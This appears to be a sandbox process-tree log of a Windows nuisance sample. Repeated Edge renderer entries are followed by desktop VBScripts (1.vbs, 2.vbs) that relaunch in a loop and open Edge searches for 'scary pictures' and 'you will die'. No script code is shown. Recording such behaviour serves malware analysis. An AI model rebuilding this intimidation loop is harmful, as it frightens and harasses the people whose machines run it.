"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
4⤵
PID:5096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
4⤵
PID:15804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
4⤵
PID:17444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1
4⤵
PID:17496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
4⤵
PID:17604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:1
4⤵
PID:17668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:1
4⤵
PID:17856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:1
4⤵
PID:17980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7528 /prefetch:1
4⤵
PID:18116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8244 /prefetch:1
4⤵
PID:18204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8420 /prefetch:1
4⤵
PID:18360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8508 /prefetch:1
4⤵
PID:18368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8800 /prefetch:1
4⤵
PID:18396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8932 /prefetch:1
4⤵
PID:18404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9056 /prefetch:1
4⤵
PID:18416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9176 /prefetch:1
4⤵
PID:18424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9300 /prefetch:1
4⤵
PID:16444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9428 /prefetch:1
4⤵
PID:3948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9552 /prefetch:1
4⤵
PID:17504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9692 /prefetch:1
4⤵
PID:3812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9816 /prefetch:1
4⤵
PID:18328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9932 /prefetch:1
4⤵
PID:18460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10064 /prefetch:1
4⤵
PID:18468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10096 /prefetch:1
4⤵
PID:18476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10308 /prefetch:1
4⤵
PID:18484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10436 /prefetch:1
4⤵
PID:18524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10556 /prefetch:1
4⤵
PID:18560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10680 /prefetch:1
4⤵
PID:18568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10804 /prefetch:1
4⤵
PID:18576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10928 /prefetch:1
4⤵
PID:18584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11052 /prefetch:1
4⤵
PID:18596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11176 /prefetch:1
4⤵
PID:18664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11304 /prefetch:1
4⤵
PID:18672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8448 /prefetch:1
4⤵
PID:20124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7084 /prefetch:1
4⤵
PID:20308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7480 /prefetch:1
4⤵
PID:20316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7364 /prefetch:1
4⤵
PID:20468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,10304130161970273883,12442084248402961262,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12240 /prefetch:1
4⤵
PID:12296

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:12268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:12284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,17272408839977196481,14149188278215207464,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 /prefetch:3
4⤵
PID:12816

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:11600

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:11784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:12320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:12400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:15120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:6400

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:16852

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:17076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:15796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:16652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:17824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:17840

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:17848

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:18216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:19228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:19468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:20108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:20136

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:14844

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:14980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:18348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:20556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,14526389907458356710,15174646172485250208,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:3
4⤵
PID:23696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:20612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:20628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1524,5300372341498063387,8793199965493995720,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3
4⤵
PID:23636

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:20640

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:20684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:20744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:20784

